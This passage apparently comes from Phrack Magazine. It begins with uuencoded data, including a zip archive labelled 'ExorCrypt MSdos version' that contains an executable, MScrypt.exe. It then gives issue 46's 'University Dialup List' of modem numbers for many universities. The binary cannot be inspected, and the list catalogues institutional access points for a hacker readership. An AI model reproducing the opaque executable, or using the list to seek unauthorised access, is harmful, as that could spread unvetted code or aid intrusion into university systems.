M,1O6Q&_GAY]7_P2B0_2X;S!#W[^:0?CCL5TQ@K6%"'=3NK:3/CN@1V5[;W%/h
M="VPY+&Z6TKZG::L.:UA9O-:S;6)VR^$.:APJB*K='QR(^B]#!D^I%W<Q/85h
MJWQMTYRN%V)8O)>B*[P3TW4U*+6^M]9KT2-EK9DFZO?!14CBMM-;:?4D6NO+h
M[8ZZ^UU[>9G=_]9]G6%`*F4BQ(MAPN#ZV)B<'V["+$B1.)M@BJ]C[$<U"19^h
MQ9C8`]O;'`MQ)[6(DCQ[HK%DZ/4N75B',L)6+7UR@:SOXL.+7Q8E<<-ZZV_!h
MK%8L.N)/N)6JP`2^%.;)\]KR9N!?_E\GNK![7KD=/\WD_RBFA-/E>3JK",?5h
MTNO[_)M;"N+E^:>G>7YT6P9X.B*L5KIR+7\+@[W;#%KVMAQ,"XZ<PJV<BV',h
M]6+#X-?3=E`;,OY47F=K6[5):\^"URY`[]=,$N#%^E-,7$[:_])ODRSY,<.Ph
M_/+!E608HX/*9@0X-2'2NYDK0:HO+#%NN?NAR8.^@+[*>FL&T=S:;I"])OR>h
M+^D+T!F`O334(^(<BKF(-[GK(-GBP???@Z^E_4??C#Z.UY5PHGV@\)TH9@HMh
M66X>=,BKPW#^ZK8:V8BOU=[,OD6FM_GV.MV%]K;A*`=A(CZG3Q]5IB*OB2+3h
M4E4C&1)FMM]?I$?&@R<DN<#.;2,M+U(G.G2UIG`Z-*F9'.8IB?<OG6T@Z^;$h
M^I@KV9LQ7+(U38VZU[_@'(UYY#OJ2->=FU>*)Y\0=^<2KF4V%S4`+?A9^L<)h
M3T_8$2#NCKQFW.:$K$CL/5H$?>N0-[UM1GG9-M(-;F&-$V_J-@^LK08FV$V;h
M1/P[_#OM`87P!.KT[^$4&!"$(N)H,"?S`5=[-9=IX#-\Y&7T)Q'_Z<.FACCTh
M\LZ>1]@='OETUW-A(9S'-MJ;;$C[!,):MJRSF2/OYQ0^"D[SM+O37][,L)GAh
M2[ZD[RLNT;+M*NL1J_"12=YVO:W<777UW;WB-/?6]UX0L.TNWA:JUK^YTVD1h
M2[!&ET]Y+V-\B3KKK6]NC2R-C?9M7O+"]N-;WPXY&86FF3+V9I$7USK4:[,Qh
MZ-=L$7E[?(V5O=:ZX>%X/5PM[F@CX<-U<+K`(/AOMA?6]]KM8C67-O,1K1M/h
MO.^^;X;PJ78$5*%CJ7807B?(J_/^9^W&TMQWQ_?],F*0\H/-O"3EJG,)S3ZRh
MYJ!B6[767(P1`#$A#8?J=7\QNKJ_FIO!1\&Y/;]/3U(S5555'?_-K+^EOZCLh
MQZK*RH<QLS6WVQF7E/JTU_GC[=:Z\&^3&&MN`8(;S.QV'6LC_4_^?0-I?B3_h
M[NA`)6N+_W\8K6)IH>LZ/_4_)LUA_3^1M0,6/AL_I9F'S,V_VG[,VG5OUNM9h
MO_J?LP[_[#86F_J<_R/B_17W6_;?,_.6&`G\I^W\W?[9/Y7]OX[U'_\?MDO)h
?Q@O.N$_Y(^\0??-'T%W5;-PEAFKB#[MVT,U,B:P[`/^#h
`h
end

ExorCrypt MSdos version:

-=) S.Encode v2.5 (=-
begin 777 MScrypt.zip
M4$L#!`H````&`%*WF6F[C95"R!T``/TM```+````35-C<GEP="YE>&4/`!(#h
M)!4V)S@Y:GM,G6X?"08!$S3E]I;WFVKM'_`B0((`00(D#?#___$"`2*,NY'Zh
M@.L];'M`@`H!RA7XK=G5@`_0T[*U$?!_P8"'K;J8/6ZY`-&G-&CUZG&C^IXCh
M7A[QQHTZ#CW8+\&!?`T4.T&_(G$+%@@5/?.$@XD+7.S5X/^;N$4Y>R]G)S@3h
M&/(1"UP[;FC2;>M=@>A]8&MBH_Y'`J]+$;>T=)^$K[@TM^3-$TA6>^HD0?03h
MU&E^ZAR?NJ-11^]2E[ZU+@IV;A"]?P_1CBBK2_X'T.X>!XROHQW=J%W_V_6/h
M&PKSC8V"@O[J!^@-6#U=C_^H'#0GU2]J3W_'E_=K<-%QRLM?[QP2V.L/2'=@h
M^NL`<?,<@$]3'B&5)2MN*=%%/7_TEQ$D;6<VX6=*EQ+M_M%'V=H1L`VK;FLWh
M@*?A]4GM$;^>(*2ZMY?-7=2M!?W_S_&\'[/'"E"17S=V"GJ@4_N+L\,\J/B`h
MDNWLK>2MD-;7D+>AN:+C:O@](P+TBX%:<6LABI:((&Q\?81K#N::UG_@VM.Yh
MO2(K,>O)6-/CK'G0@)"67CZ0:->/6XV7R=HB]C(O<T/J-.X#7@8K9RY'L/;Xh
MUO8!3HU/Z/4C\6M\?GE\`'2&K=]!*NP+\___)/,^*N"-\Y7`[(MO_C]HG.!>h
MV'LQ3>7K&Y3MN/>,P1$-V0F`B1[P)=QAAR\!3$5?(O6'^!*(CHI,RS?P)?"4h
MKFGM!KY$$9GL>P%-.*9O6M>WKJ\(R1KW9$V/LN<!_T/&;0J:E@3M!'&C8J8+h
M,7-?S#0>9JZ,F5[#S)TQTUZ8.3=F.@JSE(V;FZ9[E"V^,P%F#J.=:V"F1S#+h
MYFA="'Q0#]6C=R*MZQU">E88S^[C6;]Z75R^ZW"`M&$V#\E3X%R!S4'^=G.$h
M;=3"5]X/[!\@1+D#?1&OW_'UP,2='MP_%Z+%C^@["H`-!77V_YG$/YB\?YN)h
M32(%0.Q$!G_CL0E.!X_4YFBA``?>3R2T,QZ^TOO][;25G&^3L<?<`"T>Y/_;h
M8\'<4`^N?";T\U4M[<$'=':L?I+L/\YL_]^FMLW;)K9AMZ:HL]XG]OT!#L>Eh
MU(ZQXUIXVSQNT"C`L@5.U:SO'$#+$[09V*=9@=:MUSV(%:K-_Q;5`'I2LN.-h
M%)F/WI48`ZQQ?&*/IX+:8&J`#C\X7U)W6@+1F?UBAW8%CG?IV`!3FQCS+`$6h
M-XA7(&/M,[<-O4<Z>[[`]^F_!K1!/1]JWU6W5<MT[;2#]L?;=!Q\YG^3@'L"h
MI,LR-T.`OC4#G&^:[L+<__\T>?FNZV9<7]Z@QP-A?_^W<("L,4=F[0_7#HA4h
MM?A[0&<H`P1\BOI?1DUDJ.4JM"\<,-V"@!]!#W1IWO.^`0O\)9QD#@"9[$3Gh
MC1M4M['R[-CLOH46_"4\^D3<S)=&#QB`G4D":YZM`'%:4#8W"P"99+.G=0-<h
MH/<2[16M=1?TLJ7R!2J[^+"G"(":TS40MIS=8T^0EN";E/C!76VHS>JQN,53h
M??(2UG\$[),<^70;>@1=SDQ;-)?%IG7XSOMS%3Y]NKCA>/O_HZ^7YZP.![\Gh
MN+C@PJ("Z<K_WW&]^V$+7_FEAO_!Q7VR`]K4,N.\H.C;"D!=Q87VZ6WZS[J8h
M^TIL2GJG1W<@/?_'_P\?98BG__"Z6YUI/U?O+9,\?]8RP8O?#YA^%:!:O/_Ch
M#N!OJ)>Q>QW^V`!HK&OH<5HH_>FFT`(CGL7INW<`09^I>4!@:`DQX?U'CR;Vh
MR1W`%FKV^]$71_^EO^_``!T1CK/F"9+N?IX)Z=[GV9#N6P5H>NU1)]**3MK)h
M23L7:<?*4R1=DCRY3(*%KB<_,WD0[Y37)VT*)SD_?7'PZ.DG1D=%F2M?'P#?h
MX%\![R>Z71<\S0X>_#9XM/3UEQ0OJN+L!UX_&OT<\4(!B_>_4OQBXJ-D^\78h
M!^[CK`;SGT.'%K=1UZQ537U=?6^Y#;C$],/RJNJ"KS/*_P4`[@/7YX4DS_[Bh
MV[C]FE,NQBGWLK>?<$I5_05M$#87VGQ]M.*@ZO@YS8M@OIB0N8MY5P'NM^8Ih
M(</,T]GF24OSVLPI0_+'#VQ^BC6\G<&KF"7TI?G%Z1?G3W*9NM`^78B.C:76h
M/CBZ#9T0+A*%]1>]#)2D_\7]HY<?X+A_O/H[P>,<&>#7Q<^B'X@_L0M=3[=Vh
M[(WW3SI^8F">.X=\UHG]`BQ:!$FT^/:)G82:=^D]:=M&6NHOMDK0-U."K7<*h
M,WN@ENDRO"15J<]V\_7K+3TR%RX`*[V"RGWTE_]S+`<I>;$^<L+Q3L+:AIA(h
MM`)I`]'LO]#3BZ$/--#(RZV9TT#A/+=DP0>W>W3LL0=.1\\X^Z(Q^\KE`X,[h
MNJVQ1;)BE0N1)'PDJNR5%[N(/Z"%X;`_GI[K?KD3SBXMG8M/=L8($(LR/S!Rh
M$RS_GXE9-GMTB_-P496X0O)U1X"IPGZ@W`9H?,[P(.46A%UP_4'(/"<\QK`Gh
M[@I(7\<\>E;ZBHFOOZ=D'\R>X%6KOA$&7/DOY;E](K@P7-U*2JDF*Q!3_>A@h
MXPASV@01R)L3:J]?SD3$+R!\\@X7PV."6DG2!IBD^@6L7!T(>26P6L`AG7,#h
M6?=R1B"0+%R`5$A4>-`.99ZXJGE?C$_9GE[-2'8"9&/]-(*K'&*`]PT`;>!'h
M\N?XG!T*/*_!+]GCJT.`WCY3+BSH1>39_%M<.3):21]Y='!@;/@"K95.,#)Sh
M`\4&Y@_PR=,C!G!G,=4-`F9J$.3Z=L4>X*3O'_#)?=7.L*[(Q=X#KS.:[U\\h
M//KX@=B&MW_HZ&SS!$-=.<!4OK[@8B(F/K:3[\/YO\U8,=&#*LF)X8T0OE*Bh
M`D;/"_8H^[H8!_&":,5AA1T1AH@@ZX]I)]BG]U,P:CE9>8[_[*MW+W^A]FQ`h
MWH#2+*[U(1GH^)`,KV`O8;+N!_!L-7X&SR(V7P?26G:!@,D:?+>%GC(A%ECSh
MRS+_D64@F_B80Q#:BL=0O('B441GDET_^KX4VFQ.3F.'YSD#4#:B'0''C6B@h
MTBE0\US)EX"6',B6)*\`XDB:I/_]3KQ")GM:QS\(?,Y_O88$OU=]]=W<6O4'h
MA<"AG#54J%/1\V:0$GPQEXOJ!!$?7'\14BK:Y\62C*`*_Z;XR1Q,3D0[@!'Gh
M!/YDO0<7>/\W@/AFW>`!DW![$,X;P@S/^/!1`F7PAX"?/+G"]V-IQ=W;AFW1h
M=KGN'PBX85-"6?6+Y\&^'CA7`'%`*HB#_!L=/HBY9YC4'V4/'#;%O.<=XBD\h
M^?3-1C?0#(>=?\!<0J_8BIS_T.0'.-O9O[OR"0.NIP_Y_K&FB\*!GQ4_^+Q_h
MV8`2W`:4=L`_^K>Y,#E=&5/KBN6U]Q1#_,2>=-*OH*1^6DK8`7PLX_72(36Sh
MTWUE\O7&(4D[X/6_$9$=)V?F20>$LBH\_0(W<7UGOD^;=M,FYX^H#X&):2[0h
M50*;@]EQ3'*P,^<"F>Z9G">R!-=W'REM+#7A"=Q9"2@MM2><5T3?'^UZ!M[3h
M.BC2_;WY]0PA$2XGT>P"`>@NJST@$D#[=0)CO_X.SH&/BY#4('(C+C7PB`]`h
M:"U@!O<6%]#Y@<&(?O$A^A,U!LWOWNY0LPLT?C!"8`G)D,^#ROP-;!XP&47Ih
M]F"$VS\(D:X6R-<CD,[]1O!M3O=(KSCZHP!TC_O;>@"'Q\S-\B(3:]/K2^R>h
M^^M7#OU((/UD@GY-T"^G!#=$"O1Z]0V2'+"BKWM$,P%I!FM](AFH/+U?CE!Dh
M%2DIMMR``!9D?:#7]5>CA2FLT%@FPAR0H9BOVP-5WMBP9_^C=0!RD_#1+(J=h
MX&@0$6&#-@NHX&Z01K&G.T`&S+/$9SJRPML@SH(!#,]'HRPXFH3P,H0W(3P,h
MX5T(+T(X'O5H%?D.M""(W9UO0)AU>1IA5ABZ_XS_5_2:&Z@/.O4PST4T2A"Wh
MZ`1"T16V84?]^@?%_;\^P?4MZT93[NB-*B:(B<EO1="J-'HK/<@%/@`_,`H4h
MWGW,`^S+P%Q#)7\?^RCBI%O.P9EQ<'M=`T21/%T,[,C[:B/]W57_COHQYOI7h
ML&3ZOP/OTO8>&Z+/O,=!GV[-GFB(!]GCQ$2T<#G$<!_%B1A;>J9U`QHI3OF-h
MZ2T*T!;)]G''"N'X;<>*X/AI27MBPYS]]RPR]`I[=%ZSP%[P1'Y"M:8'63O(h
M1=N:QGHZ")C_#=ASS';']PS`[%*8+\&L0`.FSQ(!)[?X_A,D>DWPCZ&$4*D2h
M@6G2\(,L;.2E9P:[=R\"=Q]JL#'XH47?@Q^V?R3WLW:]`1B^WHFZH):A1_>@h
M1UL@6C&^)N9RX;CD<GG;IH?"$C3)E)2`G#D"?Y>4S`,D.Z+9%^5240VLL9Y0h
M'6W9YD@GH)_'Y*N$NW:!'!3$4UW`NU'!QE+<$.+V?*NMN'4D^[J`(9S9@)BNh
MB'^*D$OZ%L>/NH<SJ48U%75`3P!HC@MH3:?$F$U._]OXCFY23X^C!S$C^+PAh
M;PN+HZ_V_8GO2[#[H;CN^+\GF2PI@N/+`N1SA,\T@&M3?#:F=&VGB_VOA]G3h
MS;=*@L)OCE7>\7".%=[Q<\;_W+,.LQYC'@_SC!QQH^LW0CZ"0<KAA8;KUCO,h
M5QJ'Z@%@OWN`3M5[E6=Y=.W\\H@QNV%_9+!/@L>`FO4]C+Y-<XA.=04_QZQ@h
MK,]6(V.%6/<"Z#--_*H`+WIBJ_Z`*(GZBL@S]/:/T$UIFR?2#AZ//IB)'1%Yh
M[N&P9(J^8'PZC:[KIJ@^DK>ILX#1O*X*ONN_+PFA!.Z-9>R-L%N,V9]A/E@Zh
MP/O:EJ;`'A\6#8-P?&?'LD;G$9G`<W\Y@,:1F-)DNH9-^OV"05('M_=*9"IOh
M>B9W/X-A;8_`M\0X6;7IC!Y2V<,H^^!)0/^_]<BMO=9=<4'$!":.'^09ED^Gh
MSA*DD2[>AX"X;KJP:(JA+NT%E.9T/C`#*MZ,]%7`[*ML`;(DOQ`>PA4-%2I%h
M7^*'9D$YCI\100M)/'UD`%,$J:9L5=\4Z8J0F(BBAXNG^N3X^K0^H\:-HK1.h
ML#HRZ.-^*>"<VC8VK6]Y>4I/?Z4]"YV1`@7F9VN"$_<R@G:]B9>I%8WN=.X7h
M@H$;LA%J9)V8WJWX2G^VS41V>MJ#88B.=GW"XT?_AMD-1!:E[0,#H!FU\2DNh
M,XJK9P2W8C^BP0T+IB\`9([(,$0)]D8A:@.S7&9J`U%FTI0HNPU.=QO)";X9h
MK\/8"G^+5I#H"M:YA-AC"4#:W"(6,,K@TA*(IK!)+MAL3([@\JDPX!.<YEX%h
M7!PJ#8B8VP.%C0K]@K/T_U.!>!V,1%]\\_]!1"G1UR^$/.6B:L1ZF-"!2.E_h
M-<]:SXS;+0N9Z"M!DTDXMJUP^QF`>_G;4-IM&.;HL].[YP3NI=(-8;L%L_'Mh
MH+Y?_,-L+V"V<PN:/M!8'M#`94`+>(G,FX:ZGD/6`H<)FDA))N3W=`W_CRX#h
M6^EV`!NG=DXYR]EH:6>C$9P-[L++$6VCV^NJ/L037YL6QY'*]17!17ZU);K;h
MYO].=AV28-(!GZ@>C8%BZP2-0S-DE96?]H?O_YWBDV:DE8/R`[E'9V`L)A$*h
M>_1?`1`MS$PV5@L@:=I$YIYJ7\Q99KN^4K8!JG0BM:GG3+G'L4[V[OXB!]V@h
M5JC^U_J['!3/9+%O$39),*[M.J)M2QW&#6/9"Y3-I,PO&$_B*,6EL%]/H'L\h
MW7Z^7SJK*4@#(IZ9>95U'U@&_]$8K!9'"DG/TBT'9R,9.>9A\JU!?,Z_,'/,h
MMFE.S[8R*+G+6<8"'#U<\`.*?2#RP>EA+LYOY%URIG7PA_N1?O]=(6<B]`>.h
MQ0(\[MNF0,5.3,DA>0RYF>O`L-LS;"E`P)W;9+M#$#",#JYKH8!B/=I.'#>6h
MDRI)&_N8:DP%]IW!ZV[3)\),U>T[/0*S`5K3`!.N5WF/\TKS=)&PL80Y78TSh
MDR^.QO9"7H#E+KE>`8]PAP,>[!.M(LR+8GV+^=?;4(16861\`>.F37A*$B)!h
M*<.8M*_'EES`W2D"REPAK:*ES9\"H.Z?#H(K;UKF?T2KH!!C&B83S@%T\`-"h
M4!&'FF[?8(\%O,R.V@']3Z#%Q9"GW:/_N1*J4V6_'QQ@`('CH0'F3S_Z_21;h
M6,3*9R?<];1]B$?W$=>CL[\?1AL@D>;M"T-R'O1.^0.UA_1`Y+TZ@+4-[!S.h
M'5,/>%SC\K2!D)_^-X!\.=OF'Q*7GX74;GS7_BFH%E"R]#/`7"36Q$S?S]X(h
MDJ;]`SG5]`J?\G\-D)=TVX335)R8GCE:2$@9R'.$Z$D#J'@CJ#K2*\L5<0-4h
M*^!P8G*"M'E0V<"^N_M)W+`PG!(X1:)<H9%RIF>7JTW<JIPLJ`L>X+4=</(`h
M<&D`N%SNKRYKW1Y`QJ"TS.0EQEU@;`A/.P*=8>R#^'RN($PTQO3%_2N@4D([h
MXD=,B$:&>"(?H1RZEL<:^LA@0!Y5GZW;`H7H/-Q@/L]3M#.!1=G'AT&`9<"Oh
M-;!/LP*M6QL4MX@&O>M8W[BD<^8J?1_B\L=OQ+[NMWJ%]):_Z%)'/KXD+;[Fh
MJ0#&VMY.D+5.8I,V#R)^H%DPM9EUP:/BU_54%_[5"T>Y_>#\`4AX8Y_N^O7Fh
MF!;!'X/E\_O"01B>(8&42QVVPO4LTEC'#!H?M@5#53O3=#_@@?H=B4#,#:;Th
M!V$W(,O76R)62M&R6*_W#2#-'$&:\0-HMLW]:#LNP^``]`+4-]"7LOV;EVDWh
M2+O'@S-NR1!+^;&:D3F=M5E\9%(J62W?=5VEZ*T#[(D:H%TD2U3NNLQ\CYH9h
M[:\;D(Q=_&)J[5L\H.ZLR.P,=^ZS:]7BZ:,GL>F+*:OF5-DS`E0U=*!D"6+Th
M#JH7=VFOM[K>*&[^_]'W3@]U:A1(?:7R\1#JLMM5N0U\Q/[R[`:S;L52]<,$h
MLA6!>\`3O>`$9&A\(+Y"Z_"=XWH#L>HK<L/2BNK3<V4WE+64J-#N=?7L"%^!h
M$#Y);H-Q<$+3"A=K"YI\%C1/#C!K:/<`=Q*?:W`EL8WX_W!#>KV^(YI3OG!;h
M;?I3?R$+?76WCU7LHWD*-(TK%4<_Q[`OP'[F]22!DK`@RGXT4(&6C]V<2,'&h
M"'#W9U@GMDE$<9T@8^R.@0F@_N54>'KG`(/2U4=;)GF[GW.XWQ7(OY6(C@2;h
MKE`DC/P<$#GT@?!;-3O-@<(@:'LQS7(^>G/?1?&!^1,S*?/!D2:JF;:\O^5^h
M><;:&4??&<WB;Y*Q1R8;YS^E8)/&#4H5,(7NGFX)^8ZFP-[?U=KK:ES<U=!'h
M$931"3K&OIZB2?\.]*LQI37CZSN/2>V./2+)ZYOK>7VU@2\W<7RG,=289$"@h
M0#&C]R(;[K^)`#\'B.N6G3I=GVG>C#J8T9L<550DP7SHH.3#(/\B5-8!*?:Dh
M08/J_O_7Y$Z+3@50M*.KBQ`>?*!QN16.JO2_+WVDL`XQ>@9.'(%RVEXN_ZS#h
MI49%WT'K"$1XY8,_4)X1*:)>;'WE=:6)J_K'FE7K\*E09TKW*%4JE)SO4`U^h
M1/\0P(@6C/!'K5M0[872AP,X`\N)]FK7Q?D;*8!:*!)M))@Q^BR/]<EU$.PVh
M,0-$HN9WWM.13F2B.P.?-5"`7N?:H(,']J?=ZC5T*2<&PBK_$:;WX.$/HV^/h
M/7#Z>MI(+L?3[S1(I<C3EV1P3W1\HJ,-K@]4/E7Z,Z#B.8`4&C*:K"M/XN5Sh
MUCZ0H]R<BZ<[#M9V4Y_3HY"N-Q$UC[XN6*@]X<#LH7/Y5J#GM)7@MDC;UELXh
M7_(AA7.TV-7%UWI/%Q&TU"[0;#"^'SUII,D*[C3(^ER:16+(MF>>N0TWH_3Wh
M\TQ(]SZ4@U$3YKEBHA1]SKL?6<*4NS'Z^.C2%R^S[UB&A>XG7A\PP$HJC87]h
M2:W0(%CJMRIM<I;7PR<06)2A:M^(@_=E$#/@+0K'4;MD=G8`%PV)8"R;8Q7Zh
MOR@@YNMQ3''TZ6(2<P3>@*)/D*YZXP4!A-#JH>'/3Y.,U-Q=1=H@W?3_YC2>h
MK6KP$_@(501_=A#@+6B9^5#LH$L6S6`L\*\!AJ%],K2)M06CIJN8B+V5O;O&h
MN@4I=09CE9%'!S\PV/`%>C?KV0,F:_`=OPNF&\7>5F,)5CW$1XNG;C!"QTCKh
MDAY`].W;11NY?2QQ#U*V4RHQ.>$8PG;=!83O;:X-P/^#68:9C:X=NSX4@-L/h
M$&\]=9&+O0=>AS??Q_/*8E-L.#*5=VF?X.K3J\L!9)*=O?T#?QZ!3:)/[JL=h
MJ9$.Q6M5XK68M3V=-CZR35$+6T.EQ4MT#+N@N[`G`,`$9SKA`*OCF4IW>TX7h
M8$:^47N`/1W1*X(H"48I;*:^!/FZ0_H<6)[OV+\%<_QOEXLH:&VD=WMK<WAKh
M+T_:;)P);^]:C5T+TO)B`GIX0"^/2]0RQ;3_A<B':;V;P&SSZ_OK#T)"U@?@h
M'^E\5U>:VL>KW_H+RKCDJXZST@207;3_S%*A')&:^0]H\.EEA1%<Z24_/0EBh
M+PG4?+::;I4N\R=KKZ[=A"W(=`M`=.T`FD??7`"QDQVXXP/WE3L*8A+JQ017h
M#/@#3*)[=2=S:3+&\G8?='<ZX-%%'UX.C'F9\ULAF)<_7R_PZ3JB)DCTXOW\h
M\G^U&/P$O-5<$`S#N8#2>75Z5=ISL/@K6."-<@QRVID_*6&<X7IU5_O`8UF?h
M(JY4G'T.TL'GL"-K'QZPH%/<%H>D%_H(@#W:>G5D<<ZO+/6^!RQ5T^O8/7G#h
M+G8/R!54GR/CM1?UL'8?+7CC]/0&`^R9K9[M^T`Z,6JO]()$%9#S26MD1]<Ch
M[Y&7!SV:D^>=&\#MZ9OO%:<Q1-%72D^/+#`E(:^NMNCT>/]#>C:T:U(-H;^Dh
M=..<[?UU>LL`(97-!UB2RA,;7<=P\:GH,YV0CN`)FN()2J+KY0^@2O$1I=!$h
M?WE'(7=>.TJ@Q]$$.">=Y5_N#/+BPZH#Q(WX/3,`;&O+ZQ1JGP'MB,PBY/HBh
MY/S^"-F(C6ENQ('1_1LO:E#(IWKB(L(UX2)^^(^UX>T&#JC['(;M[O#_-T'5h
M%Q``+^[X3R-^H`'V*SJP#C1W@QD)B_VU@J#-Y0ME?^5CS'^R`HZ=`GX^)^]`h
M#^=5"+NEZOO;2HFA@B4!W'"V"[P??Y)PJ?#I!&&@XG8%$CRI>K'PA</KBO/Dh
MG[(V1/9$_S<F&H!A+5<^%I%/M4)ZZLQ_FJ[`)/$C)<9N,:=K.4FHH@.]\NY1h
MNB817*,57#<R3?(,PAIY=O?VB[&19<8F<<>A;">609O#\VP!Z^C87NIUZ7$[h
M_/MF%4;2@/V^^8'1Y33$Q+][@,9TAPG:N;6&WO(36.#:9(&1YEORS(4CV$IVh
M6/425%-G&KD0C:WCM*EC1^8L43_@F,7A://HJ5><#/`0F@PBAB;#+9D+4_YIh
MWB&Z$90!&QF497@$3D8N<+*\Q,;\1JL*BB=0O`&ALS+^=4M8-(!@=-.I(*76h
M==N2:MJV94$R32M6;EBY>4&V!#GT+=R\<M.>14L7),JQ*4'&S(DS)TN03=..h
ME?MV[ELSTW4O%RZ$?A;Y#>]6@--PP8`#L*CO'/K5:%*F1;\F=6KTR3E@4P08h
M.'#@@`&V@04WE0^)AH8B9[60<L?8,"%#A@PBX18M_I?84`)CE>T%AN5H7``Rh
M*6#*).$!SR2!,0.^(!A`@,J^"#B#8``+*DDD2K=UV;)-88ROT+Q'N`,+PICFh
M:2`8P\;1$@@6>)#A)BR*QW`?TKK#>=SMQG0)$Z28VQUI6KIMP[H%F91N6#:6h
M6F$^A94NJA-DR;D@>29U"[>.^6;3LBWK@SG2F$XS<LOB3+9L%Y?J<@$6E>,Yh
MRWF?+AK$/LT[2CG_W;X1VZ0^+1GS[Y3#OD$:80ZN''8,V.8-?@Y8TV&LLD?#h
M6H,L4V3?VK7GGNK0ZOZ29(9]+DL%Q:S9^^YH!\'Z+L,R#P1E*W80^Q*</5>Qh
M)I1CC#9%NE53Q8D[`*/-CX/XFE8I=D<S+;8'-TOVNVB^K"A1JM#WE2M3>NT)h
M$V])O"E#&#M,F"G:2;EE%LYRW:(4\\S[#)N9=Y-G@UO+DA&"S=FB=8XT1.O/h
MTXFO?=2GC^2EVF!ZF`T5=%YL]K%KLKC=LG+-LGU[)WJ``[;YC&T).OW/8`^2h
M;%J[::9HL&_R5@`&SG.`BQBU#/%U;K6CAW-TXIM](R=WTQX3=N,I]=?N_`$0h
MFVTL1U:<CJQH&30H"-$RHE4&T7*WO='=G@4)]PW<-C6+MK<G@^\!S'F,M=ECh
MFS@5E8>=.X>5$QM+J/\'4$L!`@H!"@````8`4K>9:;N-E4+('0``_2T```L`h
M`````````````````````$U38W)Y<'0N97AE4$L%!@`````!``$`.0```/$=h
$``````#!h
`h
end

-=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=-


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 13 of 28

****************************************************************************

                        The Phrack University Dialup List


[We've been compiling all these for months now, and still have
 hundreds more to add.  If you know dialups for any other .EDU
 sites or Universities elsewhere in the world that are on
 the Internet, please mail them to us at phrack@well.com.

 Please, Universities ONLY...this is a list to assist students.  :)  ]

-----------------------------------------------------------------------------

201-529-6731    RAMAPO.EDU

201-596-3500    NJIT.EDU

201-648-1010    RUTGERS.EDU

203-432-9642    YALE.EDU

205-895-6792    UAH.EDU

206-296-6250    SEATTLEU.EDU

206-552-5996    WASHINGTON.EDU
    685-7724
        7796

209-278-7366    CSUFRESNO.EDU

209-632-7522    CALSTATE.EDU

209-474-5784    CSUSTAN.EDU
    523-2173
    667-3130
    723-2810

210-381-3681    PANAM.EDU
        3590

210-982-0289    UTB.EDU

212-206-1571    NEWSCHOOL.EDU
    229-5326

212-854-1812    COLUMBIA.EDU
        1824
        1896
        3726
        9924

212-995-3600    NYU.EDU
        4343

213-225-6028    CALSTATELA.EDU

213-259-2732    OXY.EDU

213-740-9500    USC.EDU

214-368-1721    SMU.EDU
        3131

215-359-5071    DCCC.EDU

215-436-2199    WCUPA.EDU
        6935

215-489-0351    URSINIUS.EDU

215-572-5784    BEAVER.EDU

215-641-6436    MC3.EDU

215-204-1010    TEMPLE.EDU
        9630
        9638

215-889-1336    PSU.EDU

215-895-1600    DREXEL.EDU
        5896

215-896-1318    HAVERFORD.EDU
        1824

215-898-8670    UPENN.EDU
        6184
        0834
        3157

216-368-8888    CWRU.EDU

217-333-4000    UIUC.EDU
        3700
    244-5109
        4976
    255-9000

219-237-4116    INDIANA.EDU
        4117
        4186
        4187
        4190
        4413
        4415
    262-1082
    481-6905
    980-6553
        6556
        6866
        6869

219-989-2900    PURDUE.EDU

301-403-4444    UMD.EDU

303-270-4865    COLORADO.EDU
    447-1564
    492-0346
        1900
        1949
        1953
        1968
        1998
    938-1283

303-458-3588    REGIS.EDU

303-556-4982    MSCD.EDU
    623-0763
        0774
    892-1014

303-698-0515    DU.EDU
    871-3319
        3324
        4770

309-438-8070    ILSTU.EDU
        8200

309-677-3250    BRADLEY.EDU

310-769-1892    CALSTATE.EDU

310-985-9540    CSULB.EDU

312-362-1061    DEPAUL.EDU

312-413-3200    UIC.EDU
        3212

312-753-0975    UCHICAGO.EDU

313-764-4800    MERIT.EDU
    258-6811

313-487-4451    EMICH.EDU

314-883-7000    MISSOURI.EDU

315-443-1320    SYR.EDU
        1330
        3396
        1045

317-285-1000    BSU.EDU
        1003
        1005
        1019
        1048
        1064
        1068
        1070
        1076
        1077
        1087
        1088
        1089
        1090
        1099
        1107
        1108

317-494-6106    PURDUE.EDU
    496-2000

317-455-2426    INDIANA.EDU
    973-8265

318-261-9662    USL.EDU
        9674

319-335-6200    UIOWA.EDU

402-280-2119    CREIGHTON.EDU

404-727-8644    EMORY.EDU

404-894-2191    GATECH.EDU
        2193
        2195

407-722-2202    FIT.EDU

407-823-2020    UCF.EDU

407-835-4488    PBAC.EDU

408-425-8930    UCSC.EDU

408-554-5050    SCU.EDU
        9652

408-924-1054    CALSTATE.EDU

409-294-1965    SHSU.EDU

409-568-6028    SFASU.EDU

410-329-3281    UMD.EDU
    744-8000
    333-7447
    
410-516-4620    JHU.EDU
        5350

410-788-7854    UMBC.EDU

410-837-5750    UBALT.EDU

412-396-5101    DUQ.EDU

412-578-9896    CMU.EDU
    268-6901
    856-0815

412-621-5954    PITT.EDU
        2582
        3655
        3720
        8072
    836-7123
        9997

412-938-4063    CUP.EDU

413-538-2345    MTHOLYOKE.EDU

413-545-0755    UMASS.EDU
        3161
        3050
        3056
        5345
        3100
        3780

413-585-3769    SMITH.EDU

413-597-3107    WILLIAMS.EDU

415-333-1077    CALSTATE.EDU

415-338-1200    SFSU.EDU
        2400

415-380-0000    STANFORD.EDU

416-492-0239    TORONTO.EDU

501-575-3150    UARK.EDU
        3506
        7254
        7266
        8690

502-588-7027    LOUISVILLE.EDU
        6020
        8999

503-245-5511    PCC.EDU

503-346-5975    UOREGON.EDU
        2150
        3536

503-370-2500    WILLAMETTE.EDU

503-725-3100    PDX.EDU
        3144
        3201
        5220
        5401

503-737-1513    ORST.EDU
        1517
        1560
        1569

503-777-7757    REED.EDU

504-286-7300    UNO.EDU

504-334-1024    LSU.EDU

505-277-9990    UNM.EDU
        5950
        6390

505-646-4942    NMSU.EDU

508-798-0166    WPI.EDU

509-375-9326    WSU.EDU

510-643-9600    BERKELEY.EDU

510-727-1841    CSUHAYWARD.EDU

512-245-2631    SWT.EDU

512-471-9420    UTEXAS.EDU
    475-9996

513-327-6188    WITTENBERG.EDU

513-556-7000    UC.EDU

517-336-3200    MSU.EDU
    351-9640

518-276-2856    RPI.EDU
        8898
        8400
        2857
        2858
        8990

518-435-4110    ALBANY.EDU
        4160

519-725-5100    WATERLOO.EDU

601-325-4060    MSSTATE.EDU
        2830
        8348

